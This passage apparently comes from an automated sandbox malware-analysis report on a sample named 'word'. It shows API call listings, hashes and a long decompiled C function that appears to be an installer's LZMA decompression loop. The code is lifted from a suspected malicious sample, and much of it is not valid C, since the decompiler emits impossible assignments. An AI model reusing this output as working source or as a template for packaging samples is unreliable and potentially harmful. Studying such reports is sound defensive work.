                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D5B
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D68
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D6D
                                                            • Part of subcall function 00405D03: CharPrevA.USER32(?,?), ref: 00405D7D
                                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004032E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 4115351271-1176120985
                                                          • Opcode ID: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
                                                          • Instruction ID: d6c3561ce191540899b591fc5212b2685f70515619ba473533d6486adf82dab9
                                                          • Opcode Fuzzy Hash: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
                                                          • Instruction Fuzzy Hash: 6BD0C911656D3072C9523B2A3D0AFCF150C8F5631AF5180BBF908B90C64B6C6A8319EF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 99%
                                                          			E004064B8() {
                                                          				signed int _t530;
                                                          				void _t537;
                                                          				signed int _t538;
                                                          				signed int _t539;
                                                          				unsigned short _t569;
                                                          				signed int _t579;
                                                          				signed int _t607;
                                                          				void* _t627;
                                                          				signed int _t628;
                                                          				signed int _t635;
                                                          				signed int* _t643;
                                                          				void* _t644;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					_t530 =  *(_t644 - 0x30);
                                                          					if(_t530 >= 4) {
                                                          					}
                                                          					 *(_t644 - 0x40) = 6;
                                                          					 *(_t644 - 0x7c) = 0x19;
                                                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                          					while(1) {
                                                          						L145:
                                                          						 *(_t644 - 0x50) = 1;
                                                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          						while(1) {
                                                          							L149:
                                                          							if( *(_t644 - 0x48) <= 0) {
                                                          								goto L155;
                                                          							}
                                                          							L150:
                                                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                          							 *(_t644 - 0x54) = _t643;
                                                          							_t569 =  *_t643;
                                                          							_t635 = _t569 & 0x0000ffff;
                                                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                          							if( *(_t644 - 0xc) >= _t607) {
                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                          								_t628 = _t627 + 1;
                                                          								 *_t643 = _t569 - (_t569 >> 5);
                                                          								 *(_t644 - 0x50) = _t628;
                                                          							} else {
                                                          								 *(_t644 - 0x10) = _t607;
                                                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                          							}
                                                          							if( *(_t644 - 0x10) >= 0x1000000) {
                                                          								L148:
                                                          								_t487 = _t644 - 0x48;
                                                          								 *_t487 =  *(_t644 - 0x48) - 1;
                                                          								L149:
                                                          								if( *(_t644 - 0x48) <= 0) {
                                                          									goto L155;
                                                          								}
                                                          								goto L150;
                                                          							} else {
                                                          								L154:
                                                          								L146:
                                                          								if( *(_t644 - 0x6c) == 0) {
                                                          									L169:
                                                          									 *(_t644 - 0x88) = 0x18;
                                                          									L170:
                                                          									_t579 = 0x22;
                                                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                          									_t539 = 0;
                                                          									L172:
                                                          									return _t539;
                                                          								}
                                                          								L147:
                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          								_t484 = _t644 - 0x70;
                                                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          								goto L148;
                                                          							}
                                                          							L155:
                                                          							_t537 =  *(_t644 - 0x7c);
                                                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                          							while(1) {
                                                          								L140:
                                                          								 *(_t644 - 0x88) = _t537;
                                                          								while(1) {
                                                          									L1:
                                                          									_t538 =  *(_t644 - 0x88);
                                                          									if(_t538 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									L2:
                                                          									switch( *((intOrPtr*)(_t538 * 4 +  &M00406926))) {
                                                          										case 0:
                                                          											L3:
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											L4:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											_t538 =  *( *(_t644 - 0x70));
                                                          											if(_t538 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											L5:
                                                          											_t542 = _t538 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t581);
                                                          											_push(9);
                                                          											_pop(_t582);
                                                          											_t638 = _t542 / _t581;
                                                          											_t544 = _t542 % _t581 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t633 = _t544 % _t582 & 0x000000ff;
                                                          											 *(_t644 - 0x3c) = _t633;
                                                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                          												L10:
                                                          												if(_t641 == 0) {
                                                          													L12:
                                                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t641 = _t641 - 1;
                                                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                          												} while (_t641 != 0);
                                                          												goto L12;
                                                          											}
                                                          											L6:
                                                          											if( *(_t644 - 4) != 0) {
                                                          												GlobalFree( *(_t644 - 4));
                                                          											}
                                                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t644 - 4) = _t538;
                                                          											if(_t538 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t644 - 0x6c);
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L157:
                                                          												 *(_t644 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											L14:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											_t45 = _t644 - 0x48;
                                                          											 *_t45 =  *(_t644 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
                                                          											if( *(_t644 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											L16:
                                                          											_t550 =  *(_t644 - 0x40);
                                                          											if(_t550 ==  *(_t644 - 0x74)) {
                                                          												L20:
                                                          												 *(_t644 - 0x48) = 5;
                                                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											L17:
                                                          											 *(_t644 - 0x74) = _t550;
                                                          											if( *(_t644 - 8) != 0) {
                                                          												GlobalFree( *(_t644 - 8));
                                                          											}
                                                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                          											 *(_t644 - 8) = _t538;
                                                          											if(_t538 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                          											 *(_t644 - 0x84) = 6;
                                                          											 *(_t644 - 0x4c) = _t557;
                                                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                          											goto L132;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t644 - 0x6c);
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L158:
                                                          												 *(_t644 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											L22:
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											_t67 = _t644 - 0x70;
                                                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                          											if( *(_t644 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t559 =  *_t642;
                                                          											_t626 = _t559 & 0x0000ffff;
                                                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                          											if( *(_t644 - 0xc) >= _t596) {
                                                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                          												 *(_t644 - 0x40) = 1;
                                                          												_t560 = _t559 - (_t559 >> 5);
                                                          												__eflags = _t560;
                                                          												 *_t642 = _t560;
                                                          											} else {
                                                          												 *(_t644 - 0x10) = _t596;
                                                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                          											}
                                                          											if( *(_t644 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											} else {
                                                          												goto L137;
                                                          											}
                                                          										case 5:
                                                          											L137:
                                                          											if( *(_t644 - 0x6c) == 0) {
                                                          												L168:
                                                          												 *(_t644 - 0x88) = 5;
                                                          												goto L170;
                                                          											}
                                                          											L138:
                                                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                          											L139:
                                                          											_t537 =  *(_t644 - 0x84);
                                                          											L140:
                                                          											 *(_t644 - 0x88) = _t537;
                                                          											goto L1;
                                                          										case 6:
                                                          											L25:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L36:
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											L26:
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												L35:
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												L32:
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											L66:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												L68:
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											L67:
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											goto L132;
                                                          										case 8:
                                                          											L70:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xa;
                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x38);
                                                          												__ecx =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                          												 *(__ebp - 0x84) = 9;
                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          											}
                                                          											goto L132;
                                                          										case 9:
                                                          											L73:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L90;
                                                          											}
                                                          											L74:
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											L75:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t259;
                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          											goto L76;
                                                          										case 0xa:
                                                          											L82:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L84:
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											L83:
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L89;
                                                          										case 0xb:
                                                          											L85:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L89:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L90:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L99:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L164:
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											L100:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t334 = __ebp - 0x70;
                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t334;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L101;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L159:
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											L38:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											L40:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												L45:
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L160:
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											L47:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												L49:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													L53:
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L161:
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											L59:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
